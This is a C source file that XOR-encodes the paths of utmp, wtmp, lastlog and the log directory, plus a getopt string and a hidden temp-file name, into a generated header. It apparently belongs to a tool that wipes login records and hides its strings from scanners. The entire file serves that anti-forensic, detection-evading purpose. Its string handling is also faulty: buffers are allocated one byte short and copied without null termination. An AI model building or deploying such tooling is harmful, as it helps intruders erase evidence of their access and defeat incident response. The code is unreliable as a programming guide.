#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUFSZ 1024

// MODIFY STRING IF YOU CHANGE GETOPTS
#define GETOPT  "hu:U:s:S:i:I:L:O"
#define TMP_FILE "/tmp/.XXXXXX"

// DEFAULT VALUES
#define UTMP	"/var/run/utmp"
#define WTMP	"/var/log/wtmp"
#define LASTLOG "/var/log/lastlog"
#define LOGDIR  "/var/log/"

void xor_buf(char *str, int key) {
	int cnt;
	int origsize=strlen(str);
	for(cnt = 0; cnt < strlen(str); cnt++) 
		str[cnt] = str[cnt] ^ key;
	if(strlen(str) < origsize)
		printf("WARNING: String trucated because XOR_KEY is in string!\n");
}

void chomp(char *str) {
  int cnt = strlen(str);
  if(str[cnt-1] == '\r' || str[cnt-1] == '\n') 
	  str[cnt-1] = 0;
}

int main(int arc, char **argv) {
    int key = 144;
    char buf[BUFSZ];
    char *utmp, *wtmp, *lastlog, *logdir;
    FILE *header;

    utmp = wtmp = lastlog = logdir = NULL;
    
    printf("Enter XOR Key [%d] : ",key);
    fgets(buf,BUFSZ,stdin);
    if(strlen(buf) > 1)
	key=atoi(buf);
    printf("Enter UTMP file [%s] : ",UTMP);
    fgets(buf,BUFSZ,stdin);
    if(strlen(buf) <= 1) 
	    strncpy(buf,UTMP,strlen(UTMP));
    chomp(buf);
    utmp=(char *)malloc(strlen(buf));
    strncpy(utmp,buf,strlen(buf));
    memset(buf,0,strlen(buf));
    xor_buf(utmp,key);

    printf("Enter WTMP file [%s] : ",WTMP);
    fgets(buf,BUFSZ,stdin);
    if(strlen(buf) <= 1) 
	    strncpy(buf,WTMP,strlen(WTMP));
    chomp(buf);
    wtmp=(char *)malloc(strlen(buf));
    strncpy(wtmp,buf,strlen(buf));
    memset(buf,0,strlen(buf));
    xor_buf(wtmp,key);

    printf("Enter LASTLOG file [%s] : ",LASTLOG);
    fgets(buf,BUFSZ,stdin);
    if(strlen(buf) <= 1) 
	    strncpy(buf,LASTLOG,strlen(LASTLOG));
    chomp(buf);
    lastlog=(char *)malloc(strlen(buf));
    strncpy(lastlog,buf,strlen(buf));
    memset(buf,0,strlen(buf));
    xor_buf(lastlog,key);

    printf("Enter Log dir [%s] : ",LOGDIR);
    fgets(buf,BUFSZ,stdin);
    if(strlen(buf) <= 1) {
	    strncpy(buf,LOGDIR,strlen(LOGDIR));
    }
    chomp(buf);
    logdir=(char *)malloc(strlen(buf));
    strncpy(logdir,buf,strlen(buf));
    memset(buf,0,strlen(buf));
    xor_buf(logdir,key);

    header = fopen("enc_strings.h","w+");
    fprintf(header, "#define XOR_KEY			%d\n\n",key);
    fprintf(header, "#define PATH_UTMP		\"%s\"\n",utmp);
    fprintf(header, "#define PATH_WTMP		\"%s\"\n",wtmp);
    fprintf(header, "#define PATH_LASTLOG		\"%s\"\n",lastlog);
    fprintf(header, "#define LOG_DIR		\"%s\"\n",logdir);

    strncpy(buf, GETOPT,strlen(GETOPT));
    xor_buf(buf,key);
    fprintf(header, "\n#define GETOPT		\"%s\"\n",buf);
    memset(buf,0,strlen(buf));
    strncpy(buf,TMP_FILE,strlen(TMP_FILE));
    xor_buf(buf,key);
    fprintf(header, "#define TMP_FILE		\"%s\"\n",buf);

    fclose(header);
	    
    return(0);
}
